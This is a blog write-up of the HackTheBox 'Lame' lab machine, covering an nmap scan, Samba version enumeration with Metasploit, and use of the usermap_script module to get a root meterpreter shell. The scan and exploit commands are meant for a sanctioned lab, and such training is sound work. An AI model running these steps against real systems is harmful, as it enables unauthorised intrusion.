Hackthebox – Lame Writeup

clock-img 18 Jan, 2022 
cat-img HackTheBox Writeups

Hackthebox – Lame Writeup

Today we are gonna solve the Lame machine from hackthebox. Lame is a Linux machine released on 14 March 2017. In the difficulty level, it is rated as an easy machine. We exploit a vulnerability in the smb port to gain direct root access. Let’s get started.

HackTheBox – Lame Writeup

Connecting to HTB Vpn:

1. First download the vpn file from the access page of hackthebox.eu

2. Open the .ovpn file in your terminal with the following command

openvpn yourname.ovpn

3. Now as the “Initialization Completed” message appears on the screen you are connected to the hackthebox network

Scanning:

1. Let’s begin by performing a nmap scan our target at 10.10.10.3

nmap -sV -A -p- –script vuln 10.10.10.3

-sV : to get the service versions on each port

-A : to get information such as os details, traceroutes, ports etc

-p- : to scan all 65535 ports

–script vuln : to check for most common vulnerabilities

We get the following details from our scan

Lame Writeup

Certified Ethical Hacking

Enumeration:

1. From the nmap result there is a smb open port running samba smbd 3.x

2. But we don’t know the version of the service. Metasploit has an auxiliary module to find out smb versions, so let’s use that

msfconsole

3. Search for smb_version

search smb_version

4. Select the exploit

use auxiliary/scanner/smb/smb_version

Lame machine from hackthebox

5. View the options needed to be set using the show options command

show options

6. We have to set the rhosts as the remote machine’s IP

set rhosts 10.10.10.3

Lame machine
Lame machine from hackthebox

7. And now we run the exploit

exploit

8. From the results we got that the smb port is running samba 3.0

9. So let’s search in google for exploits on samba smb 3.0. After some searching we got to know that there is a metasploit module called usermap script which can be used to exploit samba smb 3.0.

Gaining access:

1. Search for usermap_script

search usermap_script

2. Select our exploit from the list by specifying the path

use exploit/multi/samba/usermap_script

3. View the options needed to be set using the show options command

show options

4. We have to set the rhosts to the remote machine address

set rhosts 10.10.10.3

5. Now lets exploit the machine

exploit

6. Ta da, we got a meterpreter shell

7. Let’s check who we are on the system

whoami

We are root !!!!

Don’t forget to check out our latest Blogs – HackTheBox  Legacy Writeup

Courses

Training Calender

WhatsApp

Phone